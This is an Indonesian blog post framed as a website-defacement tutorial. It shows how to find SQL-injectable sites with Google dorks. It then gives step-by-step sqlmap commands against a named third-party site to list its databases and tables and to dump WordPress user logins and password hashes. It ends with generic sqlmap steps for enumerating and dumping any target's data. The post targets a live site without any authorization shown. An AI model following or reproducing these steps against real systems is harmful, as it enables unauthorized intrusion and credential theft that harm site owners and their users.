Follow Instagram Kami [=>] www.instagram.com/rinaldi1001101 [=]

Jumat, 10 Juli 2015

Deface Website Dengan Metode SQL Injection SQL-MAP

Assalamu'alaikum sob (^_^). Mungkin tutorial ini agak jadul sob wkwkwkwk, karena sudah banyak blog yang memposting nya !! tapi ngak apa-apalah , untuk mengisi blog saya , adapun tutorial sqlmap pada windows dan bada backtrack hampir sama (^_^) tetapi pada windows agan harus menginstall sqlmap dan python.






  • sqlmap download : http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.tar.gz/download?use_mirror=ncu
  • python download : http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.zip/download?use_mirror=ncu 
  •  
  • Kelebihan menggunakan SQL Map:
    1. Bisa melakukan SQL Injection dengen beberapa method seperti:
    - Boolean-Based Blind SQL Injection
    - Time-Based Blind SQL Injection
    - Error-Based SQL Injection
    - UNION Query SQL Injection
    - Stacked Query SQL Injection
    2. Bisa berjalan baik untuk beberapa jenis database seperti:
    - MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase &SAP MaxDB

    Langsung saja buka marinecyber sqli scanner di sini dan tulis google dork di kolumn yang tersedia , kalau google dork nya agan bisa lihat di sini atau di sini , dalam contoh ini saya menggunakan dork "inurl:opinions.php?id="


    • pilih salah satu situs target nya disini saya menggunakan situs di bawah ini
    Found : http://golosdoma2.com/opinions.php?id='21 <-- SQLI Vuln Found..




    klik ajah link tersebut , dan saya melihat 


    Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/users1/v/victarius/domains/golosdoma2.com/opinions.php on line 25

    Bahwa situs tersebut memilki bug , dan insyaallah bisa di masuki sob (^_^)

    • buka command prompt ketik " cd C:\Users\BL4CK_3YE116\Desktop\sqlmap " tanpa tanda petik , directory C:\Users\BL4CK_3YE116\Desktop\sqlmap merupakan directory folder tempat sqlmap berada

  • setelah itu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) di sini saya menggunakan situs http://golosdoma2.com/opinions.php?id=22 , dan saya mengetik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 untuk scan situs tersebut


  • lalu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) --dbs disini saya menggunakan sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 --dbs , untuk melihat database situs tersebut

Saya menemukan  information_schema dan victarius

  • saya menggunakan database " victarius " lalu sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius --tables untuk melihat tables dari database tersebut


Saya menemukan table wp_users yang menurut saya menarih , :) hehehe

  • setelah itu ketik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users --column , untuk melhat  column dari tables tersebut , lalu muncul

Saya pilih column ID,user_login,user_pass yang menurut saya menarik (^_^)

  • dump column tersebut dengan cara sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users -C ID,user_login,user_pass --dump , lalu muncul dah


Password tersebut adalah MD5 wordpress , dan setahu saya ngak bisa di crack ! :( tapi dalam sqlmap ada tools untuk menebak jenis password tersebut dengan dictionary yang ada :) untuk melihat definisi dan jenis hash bisa di lihat di sin

Tambahan :

Biar lengkap saya kasih step-stepnya:
  • Test injeksi dengan men-fetch banner mysql (versi mysql)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --banner
  • Fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db), langkah ini ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --current-user --current-db
  •   Fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (–dbs)
Dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi. ./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --dbs
  • Fetch list tables di database portal dengan flag (-D nama_tabel –tables)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel --tables
  • Fetch isi kolum pada setiap tables dengan flag (–columns)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel  -T nama_kolom --columns
  •  Sekarang kita akan men-fetch hanya isi dari kolum dengan flag (-D nama_tabel -T kolom -C isi_kolom1,isi_kolom2 –dump)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel  -T nama_kolom -C isi_kolom1,isi_kolom2 --dump

  •  

Tidak ada komentar:

Posting Komentar